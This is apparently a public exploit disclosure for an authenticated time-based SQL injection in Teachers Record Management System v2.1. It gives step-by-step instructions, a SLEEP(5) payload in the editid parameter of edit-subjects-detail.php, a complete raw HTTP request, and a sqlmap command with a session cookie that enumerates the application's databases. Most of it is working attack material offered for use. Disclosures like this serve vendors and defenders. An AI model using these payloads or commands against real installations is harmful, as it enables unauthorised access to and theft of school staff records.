# Exploit Title: Teachers Record Management System v2.1 | Authenticated Time-Based SQLi # Date: 2025-03-04 # Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un # Vendor: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/ # Demo Site: https://phpgurukul.com/?sdm_process_download=1&download_id=10739 # Tested on: Kali Linux # CVE: N/A PoC: 1. login with admin credentials and go to subjects tab. 2. manage the subject, edit a subject as you want, and change the "edited" parameter to SQLi payloads. Example: http://localhost/trms/admin/edit-subjects-detail.php?editid=SLEEP(5)-- - -------------------------------------------------------------- -------------------------------------------------------------- Request : GET /trms/admin/edit-subjects-detail.php?editid=SLEEP(5)--%20- HTTP/1.1 Host: localhost sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=2b5914a62f5bbda4b9e6a7fdaf4f7569 Connection: close -------------------------------------------------------------- -------------------------------------------------------------- sqlmap command : sqlmap -u "http://localhost/trms/admin/edit-subjects-detail.php?editid=1" --dbs --batch --cookie "PHPSESSID=3dccea128fec3bd7717ac9d4c354c00c"